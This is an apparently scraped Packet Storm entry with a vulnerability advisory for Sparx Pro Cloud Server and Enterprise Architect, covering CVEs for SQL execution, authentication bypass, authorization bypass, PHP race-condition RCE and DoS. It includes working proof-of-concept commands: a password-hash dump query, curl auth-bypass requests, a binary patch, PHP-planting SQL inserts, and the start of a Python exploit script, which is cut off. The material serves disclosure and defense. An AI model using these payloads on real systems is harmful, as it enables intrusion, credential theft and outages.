{"id":56965,"date":"2026-05-26T11:36:19","date_gmt":"2026-05-26T11:36:19","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=56965"},"modified":"2026-05-26T11:36:19","modified_gmt":"2026-05-26T11:36:19","slug":"sparx-pro-cloud-server-61-sparx-enterprise-architect-171-sql-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=56965","title":{"rendered":"\ud83d\udcc4 Sparx Pro Cloud Server 6.1 \/ Sparx Enterprise Architect 17.1 SQL Injection_PACKETSTORM:221993"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-05-26T16:00:43&#8243;,&#8221;description&#8221;:&#8221;Multiple vulnerabilities in Sparx Pro Cloud Server PCS versions 6.1 and below and Sparx Enterprise Architect versions 17.1 and below allow a remote unauthenticated attacker to execute arbitrary SQL queries both read and write within any configured&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-05-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-05-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Sparx Pro Cloud Server 6.1 \/ Sparx Enterprise Architect 17.1 SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:221993&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-42096&#8243;,&#8221;CVE-2026-42097&#8243;],&#8221;sourceData&#8221;:&#8221;\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\\n    Multiple vulnerabilities in Sparx Pro Cloud Server and Enterprise Architect\\n    
\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\\n    \\n    General information\\n    \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\\n    \\n      Multiple vulnerabilities in Sparx Pro Cloud Server (PCS) versions \\u003c=\\n      6.1 and Sparx Enterprise Architect versions \\u003c=17.1 allow a remote\\n      unauthenticated attacker to execute arbitrary sql queries (both read\\n      and write) within any configured database. In case where PCS is\\n      installed with WebEA the vulnerabilities allow further for remote\\n      unauthenticated code execution (RCE) within the web server context.\\n    \\n      CVSSv4 chained score: *10.0 Critical*\\n      (AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/VI:H\/VA:H\/SC:H\/SI:H\/SA:H)\\n    \\n    \\n    Fix\\n    \u2550\u2550\u2550\\n    \\n      Currently vendor *did not resolve* any of the CVEs. The PCS\\n      authentication bypass and race condition seem to be easy to implement\\n      and I hope vendor will release patches soon.\\n    \\n      As a workaround it is best to isolate the PCS instances from internet\\n      and untrusted networks. Create frequent backups and review access logs\\n      if possible. 
You could also setup a proxy to limit the PCS\\n      authentication bypass (dropping requests with no or wrong model query\\n      parameter.\\n    \\n    \\n    [Vulnerabilitiy #1] Sparx Pro Cloud Server SQL Command Execution\\n    \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\\n    \\n    CVE\\n    \u2500\u2500\u2500\\n    \\n      CVE-2026-42096 &#8211; Broken Access Control in Sparx Pro Cloud Server\\n    \\n    \\n    Affected versions\\n    \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      Sparx Pro Cloud Server versions \\u003c= 6.1 build 167\\n    \\n    \\n    CVSSv4\\n    \u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      9.4 Critical\\n      (CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/VI:H\/VA:H\/SC:H\/SI:H\/SA:H)\\n    \\n    \\n    Impact\\n    \u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      PCS works as a remote model for a thick client, running on user&#8217;s\\n      computers, called Enterprise Architect (EA). EA connects to PCS and\\n      works with the exposed database by directly running SQL queries.\\n      Besides user authentication (which is also vulnerable &#8211; see\\n      vulnerability #2 below) there is no additional access control. Any low\\n      privileged user can actually run any sql queries permitted by the\\n      configured external database user. 
Usually the user configured is at\\n      least having full access to the model database &#8211; thus any low\\n      privileged user can actually destroy the whole model, retrieve and\\n      change other user&#8217;s password hashes and more.\\n    \\n      The problem seems to be with legacy thick client EA architecture which\\n      simply works on a database to manage all the model details.\\n    \\n    \\n    Details\\n    \u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      The client (EA) is connecting to the PCS HTTP server. The server might\\n      require authentication *if it is properly configured* &#8211; an admin can\\n      check \\&#8221;Enable Security\\&#8221; in EA but still not select \\&#8221;Require a secure\\n      and authenticated connection\\&#8221; in PCS configuration what results in *NO\\n      SERVER SIDE authentication at all*.\\n    \\n      Assuming the server side authentication is required the PCS verifies\\n      the authentication according to configuration &#8211; e.g. login\/password,\\n      Active Directory or OpenID.\\n    \\n      Then the EA client sends request to perform SQL queries on the\\n      database in an ecrypted form but the whole encryption scheme is built\\n      into the client EA binary (actually downloadable from the vendor\\n      webside without any authentication &#8211; as trial version). The encryption\\n      is symmetric using a key contained within the binary itself thus\\n      simply this is not any security measure (security by obscurity).\\n    \\n      An attacker can obtain the key and then *create and send custom SQL\\n      queries to be performed by the database*.\\n    \\n    \\n    PoC\\n    \u2500\u2500\u2500\\n    \\n      Exploit: https:\/\/github.com\/br0xpl\/sparx_hack\/blob\/main\/eacrypt.py (packet storm attached poc at bottom)\\n      is a python script which exploits the SQL vulnerability by encrypting\\n      any SQL command and sending it to the server. 
For security,\\n      the real key is removed from the exploit code.\\n    \\n      This script receives all users and their hashes from PCS:\\n      \u250c\u2500\u2500\u2500\u2500\\n      \u2502 python3 eacrypt.py http:\/\/${PCS_HOSTNAME} model \\&#8221;select * from t_secuser, t_xref where t_xref.Type=&#8217;User Setting&#8217; and t_xref.Name =&#8217;SHA-256&#8242; and t_xref.Client=t_secuser.UserID\\&#8221;\\n      \u2514\u2500\u2500\u2500\u2500\\n    \\n    \\n    Solution\\n    \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      It will be hard to introduce proper authorization for all types of SQL\\n      queries &#8211; this would require to rewrite the logic to use some higher\\n      abstraction API which can be properly authorized.\\n    \\n      Until a proper authorized API will be provided a quick solution could\\n      be at least to verify the SQL queries executed and block the most\\n      dangerous like asking about other users&#8217; passwords and so on. Maybe a\\n      query whitelist with limiting the view of some critical assets like\\n      hashes.\\n    \\n      For sure it should be transparently stated in the PCS and EA\\n      documentation web page. Some integrators and admins are aware of this\\n      risk (there are some topics on the forum mentioning that the model\\n      security is not in fact security) but this *should be well described\\n      in both product documentations* as a limitation and risk which needs\\n      to be understood by clients and taken into consideration at an early\\n      stage while designing a production system. 
Otherwise it poses a high\\n      risk for any company using those products.\\n    \\n    \\n    [Vulnerability #2] Sparx Pro Cloud Server Authentication Bypass\\n    \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\\n    \\n    CVE\\n    \u2500\u2500\u2500\\n    \\n      CVE-2026-42097 &#8211; Authentication Bypass in Sparx Pro Cloud Server\\n    \\n    \\n    Affected versions\\n    \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      Sparx Pro Cloud Server versions \\u003c= 6.1 build 167\\n    \\n    \\n    CVSSv4\\n    \u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      9.2 Critical\\n      (CVSS:4.0\/AV:N\/AC:H\/AT:N\/PR:N\/UI:N\/VC:H\/VI:H\/VA:H\/SC:N\/SI:N\/SA:N)\\n    \\n    \\n    Impact\\n    \u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      An attacker can *omit PCS authentication* and e.g. combined with the\\n      previous vulnerability be able to remotely execute arbitrary SQL\\n      commands (read and write) *without authentication*.\\n    \\n    \\n    Details\\n    \u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      It seems that PCS requires authentication based on requested URL. EA\\n      clients sending the encrypted SQL query to PCS are using an url which\\n      looks as follows:\\n    \\n      \u250c\u2500\u2500\u2500\u2500\\n      \u2502 https:\/\/${PCS_SERVER_HOSTNAME}\/SparxCloudLink.sseap?model=${MODEL_NAME}\\n      \u2514\u2500\u2500\u2500\u2500\\n    \\n      PCS seems to look at the URL and decides how to authenticate the\\n      request. 
Unfortunately the SQL command query sends a POST request with\\n      a binary blob where the model name is defined one more time and this\\n      is the value that is further used by PCS to execute the query.\\n    \\n      Thus an attacker can simply omit the model query parameter and send\\n      the model name only in the binary blob in both TLS and non-TLS ports\\n      and the query will be executed even though there was no\\n      authentication.\\n    \\n    \\n    PoC\\n    \u2500\u2500\u2500\\n    \\n      To quickly verify, compare the authenticated response for a request:\\n      \u250c\u2500\u2500\u2500\u2500\\n      \u2502 curl &#8216;https:\/\/${PCS_HOSTNAME}\/SparxCloudLink.sseap?model=${MODEL_NAME}&#8217; -X POST  -vvv &#8211;data &#8216;whatever&#8217; -k\\n      \u2514\u2500\u2500\u2500\u2500\\n    \\n      which responds 401 Access Denied, to the response of a request without the\\n      query param:\\n    \\n      \u250c\u2500\u2500\u2500\u2500\\n      \u2502 curl &#8216;https:\/\/${PCS_HOSTNAME}\/SparxCloudLink.sseap&#8217; -X POST  -vvv &#8211;data &#8216;whatever&#8217; -k\\n      \u2514\u2500\u2500\u2500\u2500\\n    \\n      which responds 500 Internal Server Error.\\n    \\n      To prove this properly, use the python code which exploits the #1\\n      SQL vulnerability and uses the URL without model query parameter to\\n      omit the authentication.\\n    \\n    \\n    Solution\\n    \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      Make a single parameter pointing to the model (either in the blob or in\\n      query param) and hook authentication and query logic on the same\\n      parameter.\\n    \\n    \\n    [Vulnerability #3] Sparx Enterprise Architect Authorization Bypass\\n    
\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\\n    \\n    CVE\\n    \u2500\u2500\u2500\\n    \\n      CVE-2026-42098 &#8211; Authorization Bypass in Sparx Enterprise Architect\\n    \\n    \\n    Affected versions\\n    \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      Sparx Enterprise Architect versions \\u003c= 17.1\\n    \\n    \\n    CVSSv4\\n    \u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      7.7 High\\n      (CVSS:4.0\/AV:N\/AC:H\/AT:N\/PR:L\/UI:N\/VC:H\/VI:H\/VA:H\/SC:N\/SI:N\/SA:N)\\n    \\n    \\n    Impact\\n    \u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      Sparx Enterprise Architect software has a security feature which can\\n      be enabled. When enabled the users can be limited to perform only some\\n      actions by roles but this is not a real security measure as it can be\\n      easily bypassed.\\n    \\n      *Any authenticated user can actually perform any action on the model*\\n      including deletion, stealing of other users&#8217; passwords and many\\n      others. 
This *includes configurations with Pro Cloud Server* where\\n      vendor advertises that PCS brings high level of security for the\\n      model:\\n    \\n            Robust security features are designed to protect sensitive\\n            model information, *including role-based access control*,\\n            encryption, authentication mechanisms and audit trails.\\n    \\n            source: \\u003chttps:\/\/www.sparxsystems.eu\/pro-cloud-server\/\\u003e\\n    \\n    \\n    Details\\n    \u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      This vulnerability, most probably, is a result of the legacy thick\\n      client architecture described in the vulnerability #1.\\n    \\n      The EA documentation states briefly that the security is not a real\\n      security:\\n    \\n            The Security system in Enterprise Architect is designed to\\n            facilitate collaboration, *not as a barrier to incursion*.\\n    \\n            source:\\n            \\u003chttps:\/\/sparxsystems.com\/enterprise_architect_user_guide\/17.1\/guide_books\/tools_ba_security.html\\u003e\\n    \\n      but right below it suggests that model assets should be secured:\\n    \\n            The information contained in the Repository is a valuable\\n            organizational asset that needs to be maintained and\\n            secured as such. The asset must be protected from both\\n            *intentional* and inadvertent compromises of content. The\\n            Security system allows update functions to be restricted\\n            to a set of users or groups with the appropriate defined\\n            permission. 
Packages, elements and diagrams can be locked\\n            by users, preventing others from updating them.\\n    \\n            source:\\n            \\u003chttps:\/\/sparxsystems.com\/enterprise_architect_user_guide\/17.1\/guide_books\/tools_ba_security.html\\u003e\\n    \\n      Unfortunately the current design is not protecting against intentional\\n      compromises of content. An attacker can modify the EA client behavior\\n      (e.g. using a debugger) to login in as any other user or administrator\\n      &#8211; then it is possible to do every possible change to the repository.\\n    \\n    \\n    PoC\\n    \u2500\u2500\u2500\\n    \\n      To show how it works it is enough to patch the binary to change the\\n      logic and accept all incorrect passwords and reject correct ones. For\\n      the file version 17.1.0.1714 of EA.exe (md5sum:\\n      69dfe7b98d1fc156d15d8aeff726cfce) the following would patch the logic:\\n    \\n      \u250c\u2500\u2500\u2500\u2500\\n      \u2502 printf &#8216;\\\\x84&#8217; | dd of=EA.exe bs=1 seek=$((0x34657B2)) conv=notrunc\\n      \u2514\u2500\u2500\u2500\u2500\\n    \\n      Then run the patched exe and try to login to local model with\\n      different password. It also works obviously for cloud models which do\\n      not require server HTTP authentication or when using the \\&#8221;Login as\\n      different user option\\&#8221;.\\n    \\n    \\n    Solution\\n    \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      The way security works for EA should be properly and transparently\\n      presented in the EA documentation and installation notes. 
The sentence\\n      quoted above is not enough and can be easily misinterpreted by many\\n      users leading to vulnerabilities.\\n    \\n      Also it should be explained that even when using PCS after\\n      authentication there is no authorization until visibility levels are\\n      enabled which are working per whole database manager not user &#8211; so in\\n      fact there is no user based RBAC but rather database manager RBAC what\\n      is much more coarse grained then per user roles access control.\\n    \\n      In terms of combination of EA and PCS it is possible to secure the\\n      design by e.g. following the recommendations proposed in vulnerability\\n      #1.\\n    \\n    \\n    [Vulnerability #4] Sparx Pro Cloud Server WebEA Remote Code Execution\\n    \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\\n    \\n    CVE\\n    \u2500\u2500\u2500\\n    \\n      CVE-2026-42099 &#8211; Race Condition in Sparx Pro Cloud Server\\n    \\n    \\n    Affected versions\\n    \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      Sparx Pro Cloud Server versions \\u003c= 6.1 build 167\\n    \\n    \\n    CVSSv4\\n    \u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      9.0 Critical\\n      (CVSS:4.0\/AV:N\/AC:H\/AT:P\/PR:L\/UI:N\/VC:H\/VI:H\/VA:H\/SC:H\/SI:H\/SA:H)\\n    \\n    \\n    Impact\\n    \u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      PCS configured with WebEA PHP application allows for remote command\\n      execution using the \/data_api\/dl_internal_artifact.php endpoint. 
This\\n      URL is used by WebEA to download content of a internal artifact. A\\n      remote attacker having access to the PCS repository is able to inject\\n      a malicious php file into the model and then request its download.\\n    \\n      The vulnerable dl_internal_artifact.php allows the remote attacker to\\n      create temporary php file and concurrently execute it before it gets\\n      deleted.\\n    \\n      The remote attacker can use this attack to gain execution in context\\n      of WebEA which allows to further explore the WebEA and PCS server\\n      configuration.\\n    \\n    \\n    Details\\n    \u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      The vulnerable file first downloads the properties of the object\\n      pointed by guid parameter:\\n    \\n      \u250c\u2500\u2500\u2500\u2500\\n      \u2502 49  include(&#8216;get_properties.php&#8217;);\\n      \u2502 50  $sObjectName = SafeGetArrayItem1Dim($aCommonProps, &#8216;name&#8217;);\\n      \u2502 51  $sDocContent = SafeGetArrayItem1Dim($aDocument, &#8216;content&#8217;);\\n      \u2502 52  $sExtension = SafeGetArrayItem1Dim($aDocument, &#8216;extension&#8217;);\\n      \u2502 53  $sFileName = $sObjectName;\\n      \u2502 54  $iExtLength = strlen($sExtension);\\n      \u2502 55  $sObjectNameEnd = substr($sObjectName, -$iExtLength);\\n      \u2502 56  if($sExtension !== $sObjectNameEnd)\\n      \u2502 57  {\\n      \u2502 58    $sFileName = $sObjectName . 
$sExtension;\\n      \u2502 59  }\\n      \u2514\u2500\u2500\u2500\u2500\\n      Listing 1: WebEA\/data_api\/dl_internal_artifact.php\\n    \\n      Then the loaded content is saved in current location (__DIR__) and the\\n      evaluated above filename and then it is returned:\\n    \\n      \u250c\u2500\u2500\u2500\u2500\\n      \u2502 77  &#8230;\\n      \u2502 78  function DownloadFromTempFile($sFileName, $sDocContent)\\n      \u2502 79  {\\n      \u2502 80    $decoded = base64_decode($sDocContent);\\n      \u2502 81    file_put_contents($sFileName, $decoded);\\n      \u2502 82    if (file_exists($sFileName)) {\\n      \u2502 83          header(&#8216;Content-Description: File Transfer&#8217;);\\n      \u2502 84          header(&#8216;Content-Type: application\/octet-stream&#8217;);\\n      \u2502 85          header(&#8216;Content-Disposition: attachment; filename=\\&#8221;&#8216;.basename($sFileName).&#8217;\\&#8221;&#8216;);\\n      \u2502 86          header(&#8216;Expires: 0&#8217;);\\n      \u2502 87          header(&#8216;Cache-Control: must-revalidate&#8217;);\\n      \u2502 88          header(&#8216;Pragma: public&#8217;);\\n      \u2502 89          header(&#8216;Content-Length: &#8216; . filesize($sFileName));\\n      \u2502 90          readfile($sFileName);\\n      \u2502 91          unlink($sFileName);\\n      \u2502 92          exit;\\n      \u2502 93    }\\n      \u2502 94  }\\n      \u2502 95  &#8230;\\n      \u2514\u2500\u2500\u2500\u2500\\n      Listing 2: WebEA\/data_api\/dl_internal_artifact.php\\n    \\n      The attacker having access to the repository fully controls both: 1)\\n      the filename and 2) the contents. Thus it is possible to simply write\\n      a .php file in the current directory.\\n    \\n      The script however deletes the file in line 91 above. 
However, there\\n      is a race condition &#8211; if the readfile takes longer to transmit (large\\n      file size, slow tcp client) then the readfile will simply block\\n      waiting for the client to receive. At the same time the file can be\\n      requested in another tcp connection executing the exploit php code.\\n    \\n    \\n    PoC\\n    \u2500\u2500\u2500\\n    \\n      1. Using vulnerabilities #1 and #2 attacker can create the artifact in\\n         the target repository:\\n         \u250c\u2500\u2500\u2500\u2500\\n         \u2502 python3 eacrypt.py https:\/\/${PCS_HOSTNAME} ${MODEL_NAME} \\&#8221;insert into t_object (object_id, object_type, name, author, style, ea_guid) values (100000, &#8216;Artifact&#8217;, &#8216;poc.php&#8217;, &#8216;Admin&#8217;, &#8216;ExtDoc=1;&#8217;, &#8216;{\\\\!A}8889BA10-6178-4047-9273-37FC75B0FCF6{\\\\!C}&#8217;)\\&#8221;\\n         \u2502 # insert the document (zipped php file simply printing \\&#8221;Test\\&#8221;) as \\&#8221;poc.php\\&#8221;\\n         \u2502 python3 eacrypt.py https:\/\/${PCS_HOSTNAME} ${MODEL_NAME} \\&#8221;insert into t_document (docid, docname, elementid, elementtype, bincontent, doctype, author, isactive, sequence) values (&#8216;{\\\\!A}8889BA10-6178-4047-9273-37FC75B0FCF6{\\\\!C}&#8217;, &#8216;poc.php&#8217;, &#8216;{\\\\!A}8889BA10-6178-4047-9273-37FC75B0FCF6{\\\\!C}&#8217;, &#8216;.php&#8217;, cast(x&#8217;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&#8242; as blob sub_type binary), &#8216;ExtDoc&#8217;, &#8216;Admin&#8217;, 177, 0)\\&#8221;  \\n         \u2514\u2500\u2500\u2500\u2500\\n    \\n      2. In one terminal start to query the poc.php file until it is\\n         executed:\\n         \u250c\u2500\u2500\u2500\u2500\\n         \u2502 while [ true ]; do curl &#8216;https:\/\/${WEBEA_HOSTNAME}\/data_api\/poc.php&#8217; -k; done 2\\u003e \/dev\/null | grep Test\\n         \u2514\u2500\u2500\u2500\u2500\\n    \\n      3. 
While the above command is executing in another terminal or logged\\n         in browser window open the following URL:\\n    \\n         \u250c\u2500\u2500\u2500\u2500\\n         \u2502 https:\/\/${WEBEA_HOSTNAME}\/data_api\/dl_internal_artifact.php?guid=el_%7B8889BA10-6178-4047-9273-37FC75B0FCF6%7D\\u0026modelno=1\\n         \u2514\u2500\u2500\u2500\u2500\\n    \\n      4. In the terminal from step 2 there should be \\&#8221;Test\\&#8221; printed (proof\\n         that php code executed), if not try to repeat step 3.\\n    \\n    \\n    Solution\\n    \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      The solution should be to return the content without saving it to\\n      disk. If necessary it should be saved in a temporary folder not\\n      accesible within webserver. Also the temporary file does not have to\\n      have the same name as the name returned &#8211; it should not use the\\n      filename from the model (controlled by user).\\n    \\n    \\n    [Vulnerability #5] Sparx Pro Cloud Server Deny of Service in the \/SparxCloudLink.sseap endpoint\\n    \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\\n    \\n    CVE\\n    \u2500\u2500\u2500\\n    \\n      CVE-2026-42100 &#8211; DoS in Sparx Pro Cloud Server\\n    \\n    \\n    Affected versions\\n    \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      Sparx Pro Cloud Server versions \\u003c= 6.1 build 167\\n    
\\n    \\n    CVSSv4\\n    \u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      8.7 High\\n      (CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:N\/VI:N\/VA:H\/SC:N\/SI:N\/SA:N)\\n    \\n    \\n    Impact\\n    \u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      An attacker can make the PCS service exit causing a Deny of Service.\\n      The error was not deeply analyzed but it is possible that this or\\n      similar buffer operation bugs could be exploited to a code execution.\\n    \\n    \\n    Details\\n    \u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      Sending an SQL query with started escape sequence \\&#8221;{\\&#8221; without the\\n      finishing curly brace causes the PCS service to terminate\\n      unexpectedly.\\n    \\n    \\n    PoC\\n    \u2500\u2500\u2500\\n    \\n      Run the following SQL query:\\n      \u250c\u2500\u2500\u2500\u2500\\n      \u2502 python3 eacrypt.py http:\/\/${PCS_HOSTNAME} model \\&#8221;select {asd\\&#8221;\\n      \u2514\u2500\u2500\u2500\u2500\\n    \\n      The script will finish with \\&#8221;Connection reset by peer\\&#8221; error and the\\n      service will exit with the following message:\\n    \\n            [FATAL]: \u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2013 [FATAL]: Thread 112 Unrecoverable\\n            error\\n    \\n    \\n    Solution\\n    \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n    \\n      Correct the handling of escape sequencing and parsing the SQL query\\n      for proper boundary checks. 
Recheck that there are no potential buffer\\n      overflow errors within the logic.\\n    \\n    \\n    Timeline\\n    \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\\n    \\n      \u2022 09.2025 &#8211; Vulnerabilities identified.\\n      \u2022 21.11.2025 &#8211; Sending details to CERT Polska to contact vendor.\\n      \u2022 25.11.2025 &#8211; First contact of CERT Polska with Vendor.\\n      \u2022 06.02.2026 &#8211; First Vendor reply with standard first-support-line\\n        questions about products, versions etc.\\n      \u2022 14.04.2026 &#8211; Because of lack of progress Vendor was informed about\\n        planned publication according to the procedure &#8211; within 90 days of\\n        providing details.\\n      \u2022 19.05.2026 &#8211; CVEs published.\\n    \\n    \\n    References\\n    \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\\n    \\n      \u2022 \\u003chttps:\/\/sploit.tech\/2026\/05\/19\/Sparx-Enterprise-Architect-PCS.html\\u003e\\n        &#8211; details with video\\n      \u2022 \\u003chttps:\/\/efigo.pl\/blog\/CVE-2026-42096\/\\u003e &#8211; summary\\n      \u2022 \\u003chttps:\/\/cert.pl\/en\/posts\/2026\/05\/CVE-2026-42096\\u003e &#8211; advisory\\n      \u2022 \\u003chttps:\/\/sparxsystems.com\/products\/procloudserver\/\\u003e &#8211; product\u2019s\\n        website\\n    \\n    Credits\\n    \u2550\u2550\u2550\u2550\u2550\u2550\u2550\\n    \\n      Author: Blazej Adamczyk (br0x) | \\u003chttps:\/\/sploit.tech\/\\u003e\\n    \\n      Team: Efigo \\u003chttps:\/\/efigo.pl\/\\u003e\\n    \\n    \\n    &#8212; packet storm attached poc &#8212;\\n    \\n    import sys\\n    import requests\\n    import urllib3\\n    import pycurl\\n    from io import BytesIO\\n    import zipfile\\n    \\n    \\n    \\n    k=\\&#8221;HERE_SHOULD_BE_THE_KEY\\&#8221;\\n    x=[4, 2, 0, 6, 3, 1, 5]\\n    xr=[x.index(i) for i in range(7)]\\n    \\n    def mangle(s:str) -\\u003e str:\\n        o=bytearray(s,\\&#8221;utf-8\\&#8221;)\\n        
for i in range((len(s) \/\/ 7)*7):\\n            o[i]=ord(s[((i \/\/ 7)*7)+xr[i % 7]])\\n        return o.decode(\\&#8221;utf-8\\&#8221;)\\n    \\n    \\n    def demangle(s:str) -\\u003e str:\\n        o=bytearray(s,\\&#8221;utf-8\\&#8221;)\\n        for i in range((len(s) \/\/ 7)*7):\\n            o[i]=ord(s[((i \/\/ 7)*7)+x[i % 7]])\\n        return o.decode(\\&#8221;utf-8\\&#8221;)\\n    \\n    \\n    \\n    \\n    \\n    def custom_decode(ciphertext: str, key: str) -\\u003e str:\\n        \\&#8221;\\&#8221;\\&#8221;\\n        Decode using the custom cipher.\\n    \\n        ciphertext : input string (Unicode)\\n        key       : key string (Unicode)\\n    \\n        Returns plaintext string (printable ASCII 0x20\u20130x7E).\\n        \\&#8221;\\&#8221;\\&#8221;\\n        output_chars = []\\n        length = len(ciphertext)\\n        key_len = len(key)\\n    \\n        for i, ch in enumerate(ciphertext):\\n            # load plaintext character as integer\\n            c_val = ord(ch)\\n    \\n            # derive key value (word from key string)\\n            k_val = ord(key[(i+length) % key_len])\\n    \\n            c_val = c_val &#8211; 0x20 &#8211; k_val + 0x40\\n            \\n            if c_val\\u003c0x20:\\n                c_val=c_val+0x5E\\n            if c_val\\u003e(0x5E+0x20):\\n                c_val=c_val-0x5E\\n    \\n            output_chars.append(chr(c_val))\\n    \\n        return \\&#8221;\\&#8221;.join(output_chars)\\n    \\n    \\n    \\n    \\n    def custom_encode(plaintext: str, key: str) -\\u003e str:\\n        \\&#8221;\\&#8221;\\&#8221;\\n        Encode plaintext using the custom cipher.\\n    \\n        plaintext : input 